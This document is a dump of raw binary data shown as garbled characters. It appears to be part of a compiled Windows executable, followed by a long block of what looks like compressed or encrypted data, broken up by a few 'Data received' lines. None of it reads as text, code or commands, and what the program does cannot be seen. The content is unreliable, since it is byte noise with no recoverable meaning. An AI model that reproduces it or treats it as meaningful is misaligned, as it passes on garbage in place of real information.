öÁu@öÁ@tñ€„ÉyƒÉëƒáþëƒñP‰ è Æÿÿ¡¸>B3É÷ÐAÇE Áè#Á‰M‰E9}ôtN‹Eôxnþÿÿuÿp\Whÿuüÿ֋Eôxjþÿÿu(ƒx u‹@\iÀDƒ ë‹@\iÀ\
Data received ƒ#߁} urf}ù…H‹EÁèf=…8WWhGÿuøÿփøÿ„#WPhPÿuøÿ֋؃ûÿt‹Eð9<˜uj [SèYÆÿÿSWh ÿuÿÖÇE‰}ÇE } u WWhÿuüÿց} u2¡|B;ÇtPÿ,p@¡”B;ÇtPÿüp@‰=|B‰=”B‰=?B} …GWWè.Åÿÿ9}tjè>Çÿÿ9}t?ÿ5”BèÆÿÿ‹ØSè´Åÿÿ3À3É;ß~‹Uð9<‚tA@;Ã|òWQhNÿuøÿ։]ÇE WWè×Äÿÿ¡”B9=Ì>B‰Eä¡È>BÇEÈ0ð‰}ôŽœX‹Eä‹Mô‹ˆ;Çtt‹ ‰EÀöÅÇE¼tCÇE¼ ‰ÈcþöÁ@tjXë‹Áƒà@öÁtƒÀ‹ÑÿuÀÁà ƒâ ‹ÑÁùÀƒâ ƒá ÂA‰EÄQhÿuüÿ֍E¼PWh ÿuüÿÖÿEôÃ‹Eô;Ì>BŒgÿÿÿjWÿuüÿ@r@¡|6B9xtjè²ùÿÿPjûhÿèðøÿÿ} u5ö¹>Bt,3Àƒ} ‹5`r@”ÀÁà‹øWÿuüÿÖWhþÿuÿ,r@PÿÖÿuÿuÿu è2ñÿÿ_^[ÉÂU‹ì} SVuƒ} u}hèòðÿÿ3À酁} ¾uÿuÿ¬q@…ÀtQjÿuè5ùÿÿ‹Ø‰u ë‹]9u u;9ˆBt3W¾@B¿ BVW‰ˆBè™ SVèð jè0ÅÿÿWVè„ _ë‹]Sÿuÿu ÿuÿ5Bÿ¨q@^[]ÂU‹ìƒì0¡„6BS3ÛV;ÃW‰Eü„°¡T?B¾xüA‹ø‰Eøƒçu ÿuVèL Vè: 9] ‰Etÿu è* E=ssÿu Vè öEøu Vÿ5h6Bÿôq@öEøuDSSh‰uäÿuü‹5Dr@ÇEÐÿÖ+lj]؉EԍEÐP¸+ÇSPÿuüÿÖSÿuÔhÿuüÿÖ;ût ‹Eˆ˜xüA_^[ÉÂV‹5È>BW‹=Ì>Bjÿ|r@ X?Bjèkïÿÿ…ÿt+ƒÆ OöFütÿt$ ÿ6èwÃÿÿ…Àu Æ…ÿuàëÿ,?Bhè2ïÿÿÿ€r@¡,?B_^ÂU‹ìƒì@SVW‹=„6B3ہ} ‰}ü…‹ƒMÐÿƒMÜÿ3À}àÇEȉ]̉]ԉ]Ø««¡°>B‹=,r@h‹H\‹@`ÿu‰M ‰Eÿ×hî£p6Bÿuÿ×hø£h6Bÿuÿ×ÿ5p6B£„6B‰EüèyîÿÿjèËöÿÿ£t6BEèP‰Œ6BÿuüÿPr@jÿÌq@‹Mð‹5Dr@+ȍEÈPSh‰MÐÿuüÿÖ¸@PPh6ÿuüÿÖ9] |ÿu ShÿuüÿÖÿu Sh&ÿuüÿÖ9]|ÿuSh$ÿuüÿ֋Eÿp0jÿuè«íÿÿö¸>Bt4Sÿ5p6Bÿ`r@ö¸>Bu jÿuüÿ`r@ë‰p6Bÿ5h6Bè£íÿÿhìÿuÿ×h0u‹øShWÿÖö¸>B„îÿuSh WÿÖÿu Sh WÿÖéс} u(EøPShìÿuÿ,r@PhÖO@SSÿÌp@Pÿìp@} ‹5`r@uf}u6Sÿ5p6BÿÖjWÿÖWèíÿÿ} uU9l6Bt&jxÇhøAè…ìÿÿÿuÿuÿu èíÿÿ_^[ÉÂjÿ5¨>BÿÖ9,?Bu¡püASÿp4ècüÿÿjèIìÿÿƒ} {u¾9}u¹SShWÿDr@;ÉE ŽóÿÈq@jáS‹ðè¬PjSVÿÄq@‹EƒøÿuEèPWÿtq@‹Mè‹Eìë ¿ÈÁè¿ÀSÿuSPQh€VÿÀq@3öF;Æ…–‹E ‰]ÈÇEÔ BÇEØÿ‰E¿-ÿMEÀPÿuWÿuüÿDr@9]tuãSÿ r@ÿ¸q@VjBÿq@P‰EÿÈp@‹ðEÀ‰uÔPSWÿuüÿDr@ðfÇ FFC;] |ßÿuÿÄp@ÿujÿ´q@ÿ°q@3Àé´þÿÿU‹ìƒìEðǨ$BDP3Àh¨$BPPPPPPÿuPÿÐp@…Àt ÿuôÿìp@‹EðÉÂÿ%Ðq@hÿt$ ÿt$ ÿ5x6BÿÔq@‹D$‹Èáÿÿƒ=@?BtÁèuGƒ=H?Btñ¡¨>Bhø‘@£ü‘@¡ >B£’@‹D$£’@Ç’@ 6B‰ ’@ÿØq@ÂU‹ììHVW‹}Wè›öE ‰EøtWÿDq@÷ØÀ@(?Bé”S‹] ƒã‰]üt…À„+öE „!¾¨BWVè}…Ût hH“@VèŠëWè €?u €=¨B\u h@WèiWè]
Data received Æä—H"ªŒàø2œò˜­>\*óÂÉé^¾‘R› R–¿J¥F /ölb'÷’ |#U×±µ!|ôéú!ti¨*€Ÿìñà Or}‘\?ݼ¹ml[^¤™<Z4{ð4<"PYšê l¼³Ñ:Ð×i¬ŸöˆUi›ð¿²š~$Åÿȉæ˜89„.t;ä1¾o|c·ۚf™õª¡&šú·ï(Tì´¡[Ò¢ÔÈc°}§†¦†èù¼‹ó(¢Í}ʎ\¦ø®tGçõ²sMP³õÚLŸ}ZæÀ„|üõó÷¡#˜½ÛÍ´Œ¾©õÛÃgه¯‘cXrßÿÁþíÔQ®S™èe!3d̽T)Jºk$R—cê*ªõ'ôáίS‚ØÉYÇ:y1ù¿§XÔ©Y¸íÕnòŒ+1Eé«ÇQbÚ7vÜL´‰Nú¼é×èÈUô…¶ K®/0'ð5ø99¶žF?¢]ßÌ÷ÌÎGÀÍù‚¿7ž£Ó!Ó+Û²QÉÇ4èühƒi“‰\Fύ̪ôÂMm8·&^Zôc™Å}(hԊ>ŒÕYö [h_ßÀDõ3®í±ZŸu®™h”O7ÀòÚ°‚ê#ø€>ʜVI”x¥~¨3ôéÃB¢ð¢ª™ “ρT\œIt뇁4XœŽ‰‘­¡gì%‰=¼2b>+ÌÆ×kÅãr5åáúÛ`þS®Š_zuŠÐŽòð[œZÂ&±Í*¦îïV'’¼¢Õ•5¢}’Ôù9ûÑ]Nˆ KL¢Ž  ¤y¾›ÜšTð¶­$MDŽ‹ù-c”!“gŸù@ŃxÌ]”ÝxUÉïöñQ¼Ýûµ%¤8åÂ3íhO"™Æ,‹É&ÓkFvä*GMoC“ýº‚0ù‰¤iv÷Ë!-I^V)ɘÑÑ_ rás­’yk\+[X0âåKbsUUþ,Uëƒî^žøYDøˆ4:U>ݑO!¿>/à«b×ÓzVXØí_¬s¸tÁ°uV€coõïryɛÌÆçf¾ö¯`ÛIÙ_|Öðpcò ¹4Ý°iéEò;‘üÓϗŸº>‡ÐÕ±³{ù ÈpdÖð¬€Q´3¸:ÛÏ:9 Çᎊ^ŽÃ¹õ÷¤Ö VŽàjíì€*•)üX^ôwðŸ7l*2¬ÍÀ¦v’·AaÁG‚½íÚ3‡ûÈ¿ s…~Ý/”È£¸bš5Øº÷‡¬,Y{”A>z,þÀWnŽòM<è8w!<Þõ‘o‘¿zÕâ”ÙÓC,½²]!1€zãú1­­ÂòÍ)««£Aɾ@;"\úRAê$WÅ̸v‘'¯m ö¿w’Ñ&¡„ñ1‚=™<=珉÷y‰…p—¼aN §¹“g~íŸ0õ,g;–LeÒÀ YÐm8ˆüt27¶à^ÅíØñü@+£Oa½|Õý8µlÛE},·Ä]¨i·uWµ~8šB‘}v€ââ÷1ýÊÞJ‘ 25ƒ¸H&²çGVGš4Íí•püÕ岒bJ°çTEg ‚`sOLln¼=ÈÕÐÊr”9™¡ÀýÏqËìPÇþÂö²Ë½˃ì­k¿ïç+ÄÜÅ$~Š®=²‘ѵWK»±í˟¼s.‹»ôkYÑÈ#¨k¢ÄW̧ ±ð³šÛ‡˜ØÐÜ«=zž ;«æô±à›åó‚zý1û뎦aRQB yó‡—èW$œI–úÑoYu§ºäʙ^zŸÚ߅ÓÌ<GK² ºHnA-Œ;óÇðôº²øJ•¹ÇUu”ȇÒ):çñè†ç½­¼™g1@²Ê^¤¡Ï’,øÇkß¡6ÅӃ=¨Ð¤„ӥʔw0(§]¸ÀÓi_€¬Zƒ¥§è²žòe‹UÑ­Ö}zÍxÇÙ|“œ~6Æ  ›ÏH†x`Û'·Þ<RîLŸ=Ôc%”aó÷F:øOòИ¸w ØÆG§ý½$¼v–-Þ×»õ¸¥ºHП~ÈÝ®ÍêontwPµ]bÈØp~±mãX¶•Ý/þÏyÉ£íþ‰aoC¿"¶µÝyŠÕ5?¨¢üÕ®Dê÷;K¢{–µ]Š*dO –'>ÄzǟÇß¹¶vÚx…Â4Ýðœ 4Ž¾yÒ¦ q#d+aDû¬·Ï“Éz–ö:ókʊÍKýî–{̍jaïìuf°ë“½X)Ö1ßÌóï†÷@‹wlÖzøZ8¤ úÄ*§Ë¢Â=Y•0Ä3Ÿ&ŠµSü[\ú4§ÿ%?{¹Y.öؖçŒN¹©Õðí{Vö˜ÑåSï½´™àËþÊ_´ g¡r8Hdù™!Ûê$B:êÖRa!x‡*)U?³'˜B3öCj S G›á±½Hi¾Â¦¯&Ÿiè•Ó ðŸÑ=&®…-¹f“Œ·Þ3‚4ðš¥>ïݕÔǒ|ÙÑpè˜Þ¶áÖDš´Á\æ†8õê ÀcÐØÇ'a0Ù¨–ÄТGðý¦¥k£Mà ÿáhòd[MÐ#½dÜRËÀ3Lk¥ì²l †'Wà¸hØJŠ›C Õ4}eànßݼãºô *ÛÉيhÖÓ<„“g|` RÈü¾L`4Xh\KG3$‚˜‰0-P¡ ˜¨_c¼{áÖà”,-TOaª6ªÍi‡ÕÓ·ÕڅÐñ¯y÷µW)ÑhÒù*ðç'ƒÊ ;qT¹Úæ@—K ð-©ô|ŒHS*|´¥‰aA(ÅzWiÎHl‡»$½N2N+\[-ŒlÝç‹ZDƒXh¯šþéÚ܌%L¤ Üžîv9Ä熃ø%{¶ºš€ âKŠ~Ą’ߣhs òʋCB¤Pp¿Î‘øÀ»Þƒ´‚¤cõêÜÎ2)3q–ú¯ Ç/}Sü²;Ì LDLÝëÿ€GˆµÜW«Èé Åù" ›ÏŽ‹Šáåm´ž˜È|‚€> u鬟6ÊãDšÔVϔÆW矞Pïë“ØÏwï®±SQ ´ÈÕ¬¶Ÿ#òQ&˂ÅíÞ}Fú»á弟¶JÔíõ{zQá¤w4d[ªBèAië_ 1üð#¢¯E¥ë$¦7š›ĪØÅø.ܕzÒ‚õRŸ’Q ¿:Ӄîë6`䐦Ëó¤?-°ç]íH°þn4[å|Dóº„hÞH³ 2ÎÏäF¬…öMíèáG‚¸ ykøԜç.Ç#˜»´k³UyA*¤ÿ,=M¼Ö?¾ÎÎi‡=˜¬sA˜‰³˜†Ü˜‰mæƒvhå…õåˆSòö+8!n7JÕý'­G.Ííœ7_ŽÙför´»ú Œµ^ajhƒwÛ Àj›Lé!(dá“t£4}ș„áî¶Ù]3(8÷SƜRŠÀ˜ÊlRÍwx9äkŒbx’ ý9ã,›PåxfGž¦Ç!¦mrä _¯b‘èÑH˜3$­¬ÅH´Ì“¡ 7[ýÒëSl¡&ÞháÄw"õ=S#¥ÆÞ­¹9â¼(H·Ö<Ç.á©Mt€bøÉ\š¥€y~¼­bd ç¶á¶NÊÊu Cm^•¢ê»uZ£52سî7äGïØ%iÆ%¥_+ÙëZºÓüÞO DWÊ9â,í6}€ˆnweá\®v {{“4À¶z ñ0TÝ­Ù¬©£eè;D2Øe£¶µ&s—ÁÉ ¤p`šUnÞa# 1æ!䘫«ç˜ÊIðÈZzGíc+ô"‡æ(i—½'¾ˆ‰U8õXâ€Gs i w*ËÍÏïô!Ú>—w^óddÌJܓˬ‹ÙÌÅ Ì4Ñâîx…›=}¤Çð¡A^2{܇CŒÞeO +ç@:³Jk‚„Û]GVߒ?UŽÐCVÒ`.‹£›\«!T&Öáj+v˜1Âs¢J ÝLvX»*™ ±¸ŒŒMeF¨|Å1t±žÓ2¨1ÑϖŽÝ›Ø–Ø͚榽Òe€ŠFz…UìÅÏ#‡²Šxmµ4ðZ.'ÿ·€Ývëcs|™ö²¸‰] رy|Žº¢ð‹«ä:S£>%e2&ÎzJš–ãÿ}qâ€~‘ì}Á|¼©åÏ<V6Lã™@^sõ:¤mAA${ƃËZÒN慽"?é¦q·®Ç]±Mϻ֑Úáý\'WC%«þQf_³¥L胔Y3”[ºV2% }·ä'å gÊ<'õq@¥%)P3ºœI½.¶íq ÿš@‡JûJv«¡äoŸ)ñI$ÂLžÎ¨þ¨Ý%Ë®s‚萕{$Me™ßÐÕÈ+}Iä:S`QÕzmqLÚÕ䔃²"oÚ½üÁ‘@Ï zæK"˗±‡À­Ú\ä{M<ÿ& ”½8?ß6„¨^/P¯]ü{'!p ò~°MõvÌUcÞr$úAzݵ¸ŒS…:@º7ìÍc$IlÞ'3eCeb‘v„\uîS#ò5¸õ%Ʊ\
Data received -Ȓ–¤ÖWl©B—6BöÀW)Óø¶ÓÕ$_»9Çgp*4ç©ï~FÜ:Dg÷l¾·û4z0ªºâÕ\žl;v±C3œSëa1!ø¤~0êúaK ™Kí¬Ùqq•:è’âh³nÊn•ÔŠH÷JגFëǛ­Èvÿ¹H´„»l¡fŽTïA9ž¢×T¿tŽ6ª5\ü߉ìZ·;³¬­‹DD[o;ã—VL²ÁÄúè^+uÐ9p&Ïò@Ü4§©¶Qª±‘àô;ÈÜçºñ ‰3 ) }oe/õ›õèÙe°}ñõZ܃`²´‰ ’É 'T•ðEÕÖfHV`óÃA4ò©G|q+Î;N@ÉjS»“¦úyá´D¶Ä^_¡I,,l1ÞzYÎҖsÛ´²cDùÎv„ƒ*…' ÈD¸š/J®±Ó™0-¯;Vô¼ I Ù#“¤õ¸#]…‚`R:œµ¥ðŒÆ™öü®vÎëó^’1óKú—K»û®ªñ܁Rt+×ÅHxœš‚ó¼³>Æ)úzD®ùú64W/†VÉày ³ M(8ã›ie‘ã£ÌOç• °à8>NïÞ6 ØÑ>cËtç²=…Ê ŸÌ ¹b–Ò,ʝWŽ0†ý:bÒ2£¾®xߙùΒHé6ê4Ìl~¹óƒÈIiÿß@-ÅÈý/ú{±ŽKUæ#SÑIƒi¡zwÇõ!£z‰â­U_sè¶S™´S|ýKÌ\y ¼õ‹5J®òOtqÀ ¾è° ÍskïòÊ%Šš…ý¹OÖ¥= ê´îÜÅìœ ÂJ–+Ý讔ŒV>ÂY¦;ÜZÞ£Óñ~4WRÐçlªy@­©gC=[[DÕÆçEõ« ýŸ1! c@ìKê¦jÚ¡ÈïuÁTOº1ãL¦™ùSfšΤYT¥IoldzŽÉ HANhfÌ0˜JKƒvIàë|h–õUóÙ3JåÓ3¦Óí\{ݑ†¥ !ü7ø@„@ èÏYƒÏ!ñ sž”@œ©Ó^±9=(Ž2w£ü—-T³¨ùX¯¿ÍÓô7ÿþ­¸ñÙeÒܚgÊx9¦`áá|øG2&tI*XHž9®^q™ìô‰ÏeŒ>qâA¡.Í{ø;s<O ýeÚg"™ZS±eì¢A¸Ûßå^SFŽ
Data received ¬aàY¦ú]ÒÅm¿`¥ÖÚU;÷þ“Àê…÷ƏÒ1Ë~(„wL›—YkÊ!¦¹3ç¹|Ø]ûgÿmg#±0~iÁÍÓ³õ À™Xáœ/cT’º{èMWÍ« õ§àµ½œß` ®‹Ñ¯ÆaaX÷Š?¶Õ“'no獫«ØÄ2ÜI¾¬[ ÿªŒG:2±„#ióºX)F† Ԗ z6`Jp÷ zwÖ ÙÛs°¦Ù*‰C:ñ¢•V"Ö¸Ú!Z׸$Eß­„â*±ˆoÆß2†6û凨>Ý^åÝ}ñôDoÿŽ¬²ªOó-IY ¡ƒ®¶ö¼bžË#ÿI¤<,‡†Œ¾Èœž;W-V“¨Ò^26òt?Òz‡áî6¦1Å' \[&Üzïçß2¼,¡{©ªA?ÆW¹±Qü L»ÛÒ«ûî{»§Y¬ç”@²è,dd£ñFµÌR*‚)—ð5MðN[šµ&½ârújàA•ËÇiGG= , &U Í+½(,.âÉÊ86eÖ}à'KwwW‡loZA5>}êD¢i´ƒ{• whM­FČ‚ˆ´ÉÆ°T"ÒP~ω”/´eâe¥¼ª¾]t«Š³€þEœ4Õl¸ÕSË⥏£.ñµKE¢.?kÕ[ö‰(uŠ7gÙ!ö ´iHëßRzËt3èÎnêçQ*ßïÏ3ï7v×?­)-â½ëPõ˜Ðg|Âì~¸ƒ^À²}~Qxx£Á©ˆ‰\aü¶¶ê8n8TJ"nÖð¬_Ò^ª´Úû£Ê6;Õ¥Ð{%~Ƹ®ꆀønàZ²Ý"?:üý˜šþ¼´¾—ð‚Œr"'Ó: S.7Îøõ ± ¼JåüÝ:•º“®< ƒ‹SªÈL՞ñːØٖ4…›Ö Õ#|6ʺœB™ùx ÂŠ<"ìâÂpvPmwk(鴔¢Å0B<£iÅxÝï?ˆ¾ŠJœRL2gkÅ1&H\gŒ^Í󹎸Ýa/vª"!rLA<=wòH~ÔÿQw夐ˆ^%Ö䝪¯¾^MçƒË ×=¹AðÙðúË °äû ­‚6Oêç{.Ç-1_¥‘ê5F~ÓB6êÝµ7 ùƒ2Xv»GÍðÙúå(%è›×³ÎªÍij!øԎìD#­÷¼Æö,Þ£ª:2Üé€ ŠX/F-ÃÒµ@-5¤ÖÙ )üчo¿lô?ÂÞPʏW“°ñŒG0À´¾žÛ‰,¾¹ -h= >”b-t¬\¶òҜ¬o ÁÃg,?kþ±ôᇞßS}ŸýgâiBƒ:œxÇÄÑ >¹Û肪‡IÏ}­ù9«ÔDIÁñÆB@*(iwÀI¡—¨JltǀÎ+öä63”àúg]Ÿê¹/|>!àoÞç6æ„·ÏÉüüPV5@ɯÿ74Ú’kÓa”-{¬ªdì¸#Ý-Úâãã­à5 jSuJP+\8x~W—¾*•ïȐù9ìۀ o¹„¿ØcŤoeS \)HƒôE'r–áÕ£sÞzR†x[ãòÍ4qμ%sÛme±X‡„Í%C+ÓÎÛtʺ<¤ÖZ ¶œî&R11wÈZhzJÕg•ªd›‡mlVyçì“'0Oêç(²ÙìúPþ©j몸§ÄVÊ×±Ho1ÓË59ÑÄ}ÀgæuQ?쟀y‡ ­—ÍB°Xí)öí÷Æ:¾>Yê…P¸d,ÆÀÜtÇu¤ Íi²aÜD´t|zM8~3 ƒJ#´ÍÄÜß#ÝÖÓg½Š27çßöUfÑìͳ¸­÷^v½ø*—Õý§KÄ"ÇbÎq¹( Ÿ2ò¤û­t­.šÝ̬ÓÒtµD…÷ü®Šàöå:ìC£ò»I„òÍ ªÞ,z„r\¥~ R)ÚV—-ìÙÓs-.±ßLè»úù‘ Ž!4*1J+µ}p#̊HÞdMüØs”´5UX‹;JßÊprhVÛÒi¼`ÕOGÚ£÷·2Ä,÷otå©ÞðMeÕ>™ŸiØg¿ÀJ~fKËÊ­u ‡üu¯Mï"JET´ÐŸÏYlV0ú/rÜ42ŸÃO2žŸü3º*°2BÏóÙs åìP]ÑCo”(ÝHZ¤ §0mšÔøÛjÍ$&#½%OÑ(dóÛ@$TÍX‰Š•éXwºØ5@ß®9%-Õ¬á¸ī­—7y™^pƒE!/x²+Å,SƒÅq¤Bm|üG}g³¿¬&È駘ßqÖÌ1¼ª×ÔPó߯\ïHdƒ›Ös,G:ëóFµÆR¡M*ßSQêe_Ý ÊgJü_å9–ðh°(&€6åôjñ¥¿·»ÖsG£“î…'=/sqëï i}e’ò^ïei“„îñ"mØ3Ё—uËŏ4£gÊpø#çûÛÓu;Íc=ß×ú{Äá¬Wî$˜`¥oDÁìѵæ•ÙeñŠ ä_å<)°Œ„q*î/óÓ»Á© ٖƒÒã%$ŽB•.Ü] »+´iî̤PünWþñÚe×? ë¥5¼±!F&fú‡AçÒVڎë¾£G“94¸ÐˆÆüНW´oñ‡f)]èôn£w¡0R>ªUx’ƒ°PôÆîÔ<¸68s$˜u {¢ 2»N µ°J=N'µ}ûá. /ñoþ8›€ lŽªð úþ!’¡;ÆÏgom?b†; ’A” ¼DÖ Þ#çTß]|†1“½mƒ¾ô¸’³˜« €sÕí“6Í«_zO«´«8õþ©¨œ.\"¿—òÜí¨½žmÒ…²NWÖPûªyPí+ý>ÉS•¤`4Ÿgiã¢8à%j-W.²!ÒÍþþÞ§âú‚[©×œâ@Àt¸ŠMÓ¡!dž̛÷éû U¢×½t½n'VëS rXœº¥=—XM?i œ蜵{ý½¿юA“…ø–5ìgüà „ã"êÍc32$à ‚@oOKFú~C€°bµÃÊAÞåþˆÜ;KhÁÍß:&Åx2ûÄáUfšÕiԙ¤{~¦npqHPê—óÛ¢'žîÛ&~Ù)VhŒ½cT¢#k^|„Èߋ·‚±7uH°ÂÎá|Ïúb¯r©†9ÈÊXxÍÝÊsG‡†o·a6kÅÜPg¬UÆ£þYN †=xZi?Ù&,Ø>gÍ9´,{î(®€êb%™¢u‰qÍ#Úw §%~LônŽX€SêNέI­&ž ü•Ð¶×YyºÇGÁF-%™ô<ÀjÅ ¥µàã@H‡¡XÌòí lå™ÞÛ²®9Ù~i‹$ߚe*é&»çüD ÉøÿT±æxR@ß'©ǒv=òàø_Hx†Ñ:ý¿,¥Vmmx÷y×$ÖrÕü°¢Ç¢ùmó]5™ä=¤”2Ɉäc. Æ]ºW#?@ßýxcŽ df|ƒè<2™T·wÞ¨ÞUר¨ì×ö¤P%‘à–)Fybbá€àdEtBc[<ŸW4ÑÏ+°V?’ðVr8ê‹Ðïq³0úÌxEÔcòŽŒÎì€ô]å{ôù)hi _bežÊx¼âwÎTF7;N­j%®Ûrx%-ðÆ]4n«ÎC€Ynïßø¯u ôªOy2¬ZÌà¤ÙNáƃ‡Y‘Æ6wôýÙ©$•»ÛËø"KlŽƒUYV›c0̀öw‘UCˆˆ&7°á|5û3_eó µszét{KÈ_®i6àÈÌøVµGY£ná¼Rò%/<\ &F2nR߈°kbm®]H $ÂHE¸dKIj¬Ý–eõ‚F}¯æÄi¶ItõáY]aÞ°—teA#ÔœâºþÆ©Î&É|È@»S~ÒäOœ+a—_éžGa¯÷ìéëÝ_Ô½O’b}ã±Ax–cIïtÇMÞÎÌiƒ¸Õe‡«AovQº[Ócb°"lFÛpJYž >>YG–jÆãçHFպ׾•Kñ´´SzDzVüwÀø”°¤†ÜžÎ,Ⱥv.8üU‰·Ó(¹af àÍU˜p§ei²iY¦XîBÚ®:“ÛLôÈYχb8a7YH;Õ*W1 ÌU6w¤ç6,Ãà‚!œöô¾ºcqb8˜À=ÙՁØ?ÞCˈ®g›´Fȕ/tÄn2YῈqñhh}Øñ6Ã%Æø&8¡øaö”cÉ)ý¿ì,ʾ±K'†y ÷ž¾œŽLã{Ä.»J(m8tÔ_ ›Á©šÑo5ÿª5ÏfžÄÒQ€*>t¤¹À  ”{ÒV´yÝÌ2 Ãžüƒyé-»Ø÷ªÌc´_…§û©îET.ä:ÏÐÜ#ô~kzZ”UÚfˆ&÷æNDˆÙ‘J¿ÂhԜ~ÞkG,ÍÁ!‰ƒ*!'éþŠÃC,ÌíB:qËbjüz!RírI’66ÐÆg0au¶5£fÍÁ¤Mƒ o Ôáev«|Ò[b0DµG}
Data received „wN‰2Ä.=ìšôp¢Øwe•ñ”È$Zr+l+d¨ ˆC°ŽaÃ7¢k³™™˜ìªÕøsÒaZ¶>,ù|ýbj´J2Fòš™y±…bãԏtçKä0ÑÐpäÎÜÉ.:.=ÿʽj]†×²«1» mØò®Ð¨ÃzTÍ$cÝ·…żK•‘‰ sŸ©¦b¿îaȨRY"1â è̱ٝ°>Vã£&ª`<=?E7}Ô¬ªú­Ð(²(üœ6œ×¸ñ8â—:oð¿eš˜ÏÁ7ä#èý äÈ ”a/bô½¦×ˆ¯PQÆ4é&jyèÆXO¶4˜Vþ‚ýò%'‹2ø3ƒPã¨ÚƒH*¡£e+Ø¿8•¦øg­n{¨î)Yï€Íû´í½Ô ξѰ±]€ûÄØm\;x_¶óp•€Yûˤë)ÅjÆÛai`FÞSÖ¿(0R] ؈@=Ù6Ãmö”1 * À„eÔ™HŊR½ß1éPA7‚ù‚§Ç \ôÀï+©°í °óW¶ñFÌA‹"[´% 2˜”T‘[>ìÈNr¯it終xÝã¢í¤°óƒ’J /‚û"ȳŽ•é窔“1ó÷$ñêœ{ÆúEŒ&ç›>ñ¢5aK)ئͱ-OëhTøÌè¿Æ‚‘iJÉ h|:4Ò %8ý/NOéZ膬uâêZ¾VÆ=e7´%©Ó5˃ ¬2í0®^ëä÷›¯z#0q…ƒª ‘ú|Q »»µŸf¨=Ö fÅ ½úöïèÞóÚ;x:ðc¸ˆ¯Æ%4a/—ÈÿCÐV,ͳBú$~ äo‰…YÇû¿‚‰É… îƒ¶tËÈȃ+¡6.½.hPˤæCÈ{÷•A ÓÔÏáR5G½LQªðƔ‹Evóïú¸„«$R#kéMOå´ÖöW÷Cª ·JbÀ] è`Ȋο¥bM)—éÔúÕV¼\6Ü@ÛÂòÖÔ-¿ ;v¤´ ¼ž`úÇ(AräS“†èg<iˆRѼ< ã»8˜¿ üŽñ@ݕûH(áл«bƒì$T‹„¼¨2¯þ¼Ð÷ (¯^{@¿WW è\‹[óð÷{9&{ø®3T% ê"¯&˜«a7a]¡B€ ž5s-»€Zḭ\«úÛÂlïk•û&ß'Ð2%â•i{«äñŠœNЮ!T0¼=6W‡¯˜èé+C ë6ózÖdtð¥eë±L¯uZAÀç;§þ%˜×À¨Š£Í ¨ÕPQ¥ÐK²ž Zg‹bs÷³4½|†”“¨O®ê@žzU50ó<Ê*Y`çehlvŒõǕdõŠð¥éúËvGÔØÌ8Õµ®“ôSí`¸Ú'ê’""„æo˜J4µü²™Òút•xǞqÙ)°@Éôíˆçù]1ÜÈÊñ§Ðš‡ÙܳêYc­“€çŶÀU—;5ÛÔ½ª‚e*$µ]kËÞß'(»5_ôÕv$ð>NThó†*BlÛL8A~2+u+sÆdHýjKV"Šä2¤¥Y žRXÓÿž ějUr–ª¿ù`,ÒF“ ¶5ð&Š…÷ZÄ×lÄ¢îùÔ¸Z%’Fz´¯à‚¨’6óÛ~X›Ñv°°z®6žÊDzt†Ììµû]éù/³Ht(WÍàééq>ÑJ)‚y~eJ þ늳â¢ÍpϔÆ=“–ëm. Ýw[\ƒlŠ.§}ݞ”ȝ#MT°¯Hج-{®3‹VUÜ Ñ§aT¡ÛÙ𾨸ÜsY5!êKfcS*¼oŸNKÿfš…œÖ:4n,ÏQÜJõhMTxö7Ì}¢¥\H¸MóZE£}#͏q$üOÍd(û³Ã躓m¯šv9ÔtÏ`1sH¨Î+o7Ñö†®¥¡–d£¦}süÔÇWGñË¥ß{=`Θ­&ïö žõ®~i­vXð¢ó 4Üþ²øÇeSOcÜÞ'XN~3ݳþqAњãÑ8é y$hŠFQf$yÍ5LT @Îy!R-¤Â0ä 'ӗ#fžÀ²‹¢ì¾O üù¿éÍ8ì?¼˜…õ†ÄW„EFj–‡SW8au»ÑýnyJbu¼I˘5H![š ’‘áö k¹·Œ‹€×%ö[5¥1ìl×F‘<Lü'Sá¿ùeqx‰2^ȓ‹ûg«\Ëf×_mc*~ô»DC>X1’£’¯»ŸÌ´‡Þ«±”.,°ÐVc€ ߬4²Tmí•ÀÓJ ˜*ˆæÎãIÿ‹+Ù.µìÁÿ8¶PŠÓ/öq °ÆT¹UÏçX d҉XÂ9™B2Å!÷²‡å儶R8¸>a‘µ«$C®žGf+W#Þooߕ²¨‡‘ŸôVÛ=Û`<¼×?}KC¦¦©‹»i¤k"RùÆÁ)PÙS‡íxÁXCcN7Ö鈘•”`ïÖÙîD´vÒbU‡GqNO2v±oŽè~÷ÉS„ÒX³ÄCï¸Íøà(/Š¹3G¾§0®žù`ö<€;ú_ϒЖ5p˜ïhËä&•Eš™xmœ"»t´-ü#†ô-Øã«Ô0¹¿¿²Î˜·¦¹NåƳò‚Z®…ÎÏZ5Ïia¬Å•~§94A¡2SUúõÈ/c/Š+ëŠzý8ýè$Yé£×¤*t†¢ôÄ¥ö´OYe$?Ò ³–“Ý]Àù¯û™20isR5W¹ºàö½7 ¬s¤üν4ú¦bö–9æòmú…"e5ê¬x§Æ¼\¨ü/3¦¼Ï}bëːˆw±ª]eðÑšž2/²ò}‘wí•Úß=#¢)Š8ìÃæ/Y€*¶C•ò§­á"\XZ€êž (êŒB!ѕŒ­Kgš‡‰Â%©f®°™)9O€/Qf¡pÂ?ÂMÕ^²ÞºtÐ&̛UAÐaLÂh…®ïEh÷±ú÷T`'«kØÄ;yÜY©ëÎéíLÇkè>Ÿän24ôèœÃgµ—œ$bñ6×M~1(Û;}F"îql´‚ ËgŸj…F”éíª 7–fºè>äwˬåÿ„yªÚ3g‰÷'þÌeâš5'Õ°-o•B-ÆCQg¾;4(¥Ã$œ\LL—э‰Ëür…0ÒQ{ðT†œ÷}|B™û¸PG Þþh¿Úö ‹3uóS)ï+ Nu@e˜eÂÏÞòêë"> 76ì^œ€;Nª>‘-‘ž÷ÀF æw¢V:;V™áʾ€ÍýˆAăŸÅé†]p·¾+•¡v403K ¾“Ôá½Z/Üû͛–ë˜ë$GÚH kBß7_™>šÇ$bÜNôˆ w¹Í²Þ]¨Sløûš¤b¯g[BàlQø´èLÈBO¨íª3OüÚRZíP¬4}»"qöç‹à—{ Òx^âªê0v$²j ‰&ÊL¥tø=˜rÛb<w໌eí›âñ‡SQ—ŽÓ¨¥>9g-êÜô.š·‰¯AM™ÝÑÊec6_–`k³žÿËp»‰-Ñǀ7Ñýç;(6®¹É–{gµ‚•î¢œtßú.…Œ^Ãи„ÓÆ^Ñeፉz;­æÚ!ñãä¹pgÃÕ]ôm…·í;Þó‚&ª„=.[@pHË`í’”@/So½ÓÓåu 